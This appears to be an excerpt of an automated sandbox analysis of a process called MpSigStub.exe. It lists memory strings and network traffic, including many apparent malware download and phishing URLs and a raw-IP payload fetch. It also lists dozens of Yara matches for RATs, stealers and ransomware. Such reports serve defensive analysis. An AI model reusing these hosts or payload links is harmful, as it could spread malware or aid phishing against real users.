Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://www.objectiveline.com/tt-onedrive/sugar.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://www.oratoriostsurukyo.com.br/arquivos/teste.hta
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.palmtipsheet.com/wp-content/calc1.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.pamelamann.co.za/1/shola/doc/purchase.doc
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://www.piriform.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.pmc-services.de
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.protectalaskasfuture.com/wp-content/upgrade/new.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://www.realvnc.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendo
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendo/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendorupdate/instreetwork.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://www.spectrumhosting.co.za/hello-3.wav
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www.sugarsync.com/pf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.tamim.pro/wp-content/themes/beonepage-pro/languages/msg.j
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: https://www.teamviewer.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/.well-known/frank/next.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/content/ak/next.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.thegoodplan.ovh/promo.php
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threadpaints.com/js/status.js
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.torproject.org/download/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.tsuburaya-prod.co.jp/wp-content/plugins/wp-ogp/sa.exe
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ultimateislandguide.com//cache/.p/next.php
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/download/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://www.vacsax.co.uk/wp-admin/mile/graceserver.php
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/post.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.yaplakal.com/go/?https://yothuful-lichretman-bboae1.netlify.app#juangondo
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.zimsgizmos.biz/wp-content/themes/zgf/images/headers/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: https://www2.bancobrasil.com.br/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://xf.zp-inwsice.online/?e=claire
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://xw.kh-imoice.online/?e=info
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: https://y/ews/Exchange.asmx
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://yerl.org/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://ygmservices.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://yoga.webnatico.com/wp-admin/maint/msci.exe
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://youc1000.com/f.html#/ywxsaxnvbi5ly2tszxlay3nnas5jb20=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zangomart.com/soft/order/information/adobe2/index.htm
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zerofatality.net/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zerofatality.net/wp-includes/js/reportpdfnew.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zerofatality.org/wp-admin/js/widgets/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://zk.fx-invoice.online/?e=info
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zxc.amiralrouter.online/testxxxx.exe

Source: unknown

DNS traffic detected: queries for: septnet.duckdns.org

Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: "https://www.facebook.com/login.php] equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: 4src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: 4src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login.php equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)

Source: global traffic

HTTP traffic detected: GET /mvbs/Host_hKVPgVgQ234.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp

Binary or memory string: DirectDrawCreateEx

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

E-Banking Fraud:

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected BlackMoon Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ragnarok ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Avaddon Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected BLACKMatter Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Jigsaw

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AESCRYPT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Rapid ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RansomwareGeneric

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ouroboros ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Fiesta Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Chaos Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected TeslaCrypt Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mock Ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Conti ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18357184238.00000138BD9CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected NoCry Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected ByteLocker Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RegretLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Crypt ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Clop Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LockBit ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LOCKFILE ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cerber ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18432672691.00000138BDF33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Rhino ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Niros Ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Buran Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected VHD ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Netwalker ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Jcrypt Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Delta Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LazParking Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Zeppelin Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Apis Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Wannacry ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected MegaCortex Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cobra Locker ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RekenSom ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Babuk Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Nemty Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
